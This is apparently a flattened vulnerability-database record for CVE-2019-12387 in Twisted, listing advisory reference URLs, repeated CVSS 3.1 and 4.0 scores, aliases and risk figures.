scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://labs.twistedmatrix.com/2019/06/twisted-1921-released.html
11
reference_url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
12
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N
13
reference_url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
reference_id
reference_type
scores
url https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2G5RPDQ4BNB336HL6WW5ZJ344MAWNN7N/
14
reference_url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://twistedmatrix.com/pipermail/twisted-python/2019-June/032352.html
15
reference_url https://usn.ubuntu.com/4308-1
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-1
16
reference_url https://usn.ubuntu.com/4308-1/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-1/
17
reference_url https://usn.ubuntu.com/4308-2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://usn.ubuntu.com/4308-2
18
reference_url https://usn.ubuntu.com/4308-2/
reference_id
reference_type
scores
url https://usn.ubuntu.com/4308-2/
19
reference_url https://www.oracle.com/security-alerts/cpuapr2020.html
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.oracle.com/security-alerts/cpuapr2020.html
20
reference_url https://bugzilla.redhat.com/show_bug.cgi?id=1719501
reference_id 1719501
reference_type
scores
url https://bugzilla.redhat.com/show_bug.cgi?id=1719501
21
reference_url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930389
reference_id 930389
reference_type
scores
url https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=930389
22
reference_url https://nvd.nist.gov/vuln/detail/CVE-2019-12387
reference_id CVE-2019-12387
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value 5.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2019-12387
23
reference_url https://access.redhat.com/errata/RHSA-2020:1091
reference_id RHSA-2020:1091
reference_type
scores
url https://access.redhat.com/errata/RHSA-2020:1091
fixed_packages
aliases CVE-2019-12387, GHSA-6cc5-2vg4-cc7m, PYSEC-2019-128
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zx5n-czhy-6qgu
Fixing_vulnerabilities
Risk_score10.0
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:rpm/redhat/python-kid@0.9.6-11%3Farch=el7sat